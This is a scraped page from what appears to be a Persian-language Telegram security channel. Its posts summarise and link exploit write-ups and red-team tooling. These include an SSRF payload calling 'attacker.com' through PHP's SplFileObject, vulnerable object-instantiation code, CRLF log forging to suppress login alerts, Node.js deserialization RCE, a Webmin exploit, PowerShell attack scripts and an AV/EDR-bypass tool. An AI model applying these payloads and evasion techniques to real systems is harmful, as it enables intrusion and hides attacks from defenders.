Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️ Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

PHP’s Arbitrary Object Instantiation:
این مورد یک آسیب پذیری هست که به حمله کننده اجازه ساختن object های دلخواهش رو در PHP میده.
کد آسیب پذیر در مقاله به طور خلاصه به صورت زیر هست
new $_GET['a']($_GET['b']);
حمله کننده اپلیکیشن آسیب پذیر رو در یک پروسه تست نفوذ داخلی پیدا میکنه. ابتدا در یک پروسه تست نفوذ داخلی یک سرویس LDAP پیدا میکنه که دسترسی بهش از طریق anonymous user امکان پذیر نبوده. بعدش با ست کردن کانفیگ زیر در فایل etc/hosts/ اش قادر به دور زدن پروسه احرازهویت میشه به دلیل اینکه سرویس LDAP با چک کردن TLS SNI احراز هویت رو انجام میداده
10.0.0.1 company.com
سپس حمله کننده اپلیکیشن PHP ای پیدا میکنه که از LAM یا LDAP Account Manager استفاده میکرده و سپس اقدام به خوندن سورس کد میکنه.
تعدادی از فایل های اپلیکیشن امکان دسترسی برای کاربران بدون احراز هویت رو داشتن که در یکی از این فایل ها ، محقق متوجه میشه که ۲ پارامتر به نام های module و HelpNumber از کاربر گرفته میشن که در نهایت به صورت زیر instantiate میشن
new $_GET['module']($_GET['HelpNumber']);
و اقدام به اکسپلویت کردن این آسیب پذیری به روش های مختلف میکنه:‌
1. Exploiting SSRF + Phar deserialization
2. Exploiting through PDOs
3. Exploiting through the Imagick Extension
برای مثال در اکسپلویت SSRF + Phar deserialization محقق به ترکیب زیر میرسه
new SplFileObject('http://attacker.com/');
از طریق کلاس SplFileObject امکان برقراری ارتباط به هر هاست لوکال یا ریموت وجود داره. که این امکان SSRF رو به ما میده و ذکر میکنه که در PHP ورژن های 8 به پایین امکان تبدیل کردن این SSRF به deserializations از طریق Phar protocol وجود داره.
لینک کامل این مقاله:
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
#PHP #Web
@securation
👍10👎2
⭕️ (ImHex) A Hex Editor for Reverse Engineers

https://github.com/WerWolv/ImHex

#hex #reverse #binary
@securation
🔥9👎1
⭕️Fully dockerized Linux kernel debugging environment

Building the kernel
Creating a root file system to use with the earlier build kernel
A debuggee container that launches QEMU with our custom kernel + rootfs
A debug container that houses the debugging logic


https://github.com/0xricksanchez/like-dbg
#linux #binary #qemu #debugging
@securation
👍8👎1
⭕️ Log forging through CRLF Injection
مقاله زیر به موضوع جعل کردن لاگ می پردازه.
جعل کردن لاگ در سیستم مانیتورینگ یک سرویس مانند احراز هویت، میتونه جلوگیری کنه از Issue شدن Alert هایی که مربوط به تلاش برای احراز هویت ناموفق هستند.
جعل کردن لاگ در این مقاله از طریق آسیب پذیری crlf injection اتفاق میفته
https://www.srccodes.com/log-forging-by-crlf-log-injection-owasp-security-vulnerability-attacks-crlf/
#CRLF #injection
#log
@securation
👍11👎1
⭕️ یک محقق امنیت بلژیکی، در جریان برگزاری کنفرانس بلک هت، استارلینک را با هزینه ۲۵ دلار هک کرده :)


https://blackhat.com/us-22/briefings/schedule/index.html#glitched-on-earth-by-humans-a-black-box-security-evaluation-of-the-spacex-starlink-user-terminal-26982

@securation
😁30👍9🔥6👎1
Carino [WetMusic.blogfa.com]
Chris Spheeris
کمی آرامش ..
12👎2
⭕️ Exploiting Node.js deserialization bug for Remote Code Execution

در این مقاله، نویسنده به اکسپلویت کردن آسیب پذیری deserialization توی Node.js می پردازه.
و از تکنیک IIFE در جاوا اسکریپت برای call کردن property مرتبط با code execution استفاده میکنه. که البته اینکه از این تکنیک کجای پیلود استفاده کنه به یه چالشی بر میخوره که توی مقاله میتونید بخونیدش.
که در نهایت تبدیل به RCE میشه.

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
#nodejs #RCE #deserialization
@securation
👍6👎1
⭕️ RCE (Authenticated) on Webmin < 1.997
CVE-2022-36446
exploit :
https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
#webmin #RCE
@securation
👍3🔥2👎1
⭕️ در پروسه Red Team ما یکی از مواردی که همیشه بهش نیاز پیدا میکنیم اسکریپت های Powershell هست که یا خودمون مینویسیم یا از منابع مختلف بروز استفاده میکنیم .
یکی از منابعی که میتونه کمک کننده باشه برای ما در پروسه ی Red Team روی سرویس های ماکروسافت و اکتیو دایرکتوری لینک زیر است که شامل موارد زیر میشه:‌

SQL & FTP Credential
brute force Local User Credential
Kerberos Double Hop
privesc
UAC bypass
clear text cached password
Simple HTTP Server
ldap info
inject payload in the memory
initial enume

https://github.com/tobor88/PowerShell-Red-Team
#powershell #redteam #AD
@securation
🔥6👍2👎1
⭕️گوگل قدرتمندترین حمله DDOS تاریخ را مسدود کرد.

پلتفرم ابری گوگل (Google Cloud) اعلام کرد که موفق شده تا بزرگ‌ترین حمله منع سرویس توزیع‌شده (DDoS) تاریخ را دفع کند.
ظاهرا هکر در این حمله توانسته در هر ثانیه 46 میلیون درخواست ایجاد کند.این حملات DDoS توسط بات‌نت Meris انجام شده است.

https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps

@securation
🔥15😁6👎1🤩1
⭕️ تکنیک ها و ابزار های زیادی در حوزه دور زدن av و edr و xdr ها وجود داره.

در ابزار مفیدی مثل incpector به قسمت های مختلفی پرداخته میشه
مثل:
انواع روش لود کردن shellcode ها (sRDI ,Pe2shو..)
انواع روش های loader-independent encoding, and loader-dependent
(native: Xor,Nop. .net: Hex,base64.)
انواع روش های دور زدن مکانیزم آنتی ویروس
(amsi bypass. wldp bypass . etw bypass)
انواع روش های دور زدن مکانیزم های edr ها
(full unhooking. manual dll mapping . direct syscalls)
تکنیک های مبهم سازی کد در powershell - C# c و ++C
و در اخر بحث code signing با certificates های ماکروسافتی
نتیجه گیری که میشه کرد این ابزار یه دید خوبی نسبت به ساختار آنتی ویروس ها و edr ها و روش های دور زدنشون به صورت پلکانی و مرحله به مرحله رو به ما اختصاص میده

https://github.com/klezVirus/inceptor

https://raw.githubusercontent.com/klezVirus/inceptor/main/slides/Inceptor%20-%20Bypass%20AV-EDR%20solutions%20combining%20well%20known%20techniques.pdf
#avbypass #redteam #edr #av
@securation
👍16👎3
⭕️ CVE-2022-32250

Linux Kernel LPE

demo video : exploit

#exploit #linux #lpe
@securation
🔥5👎1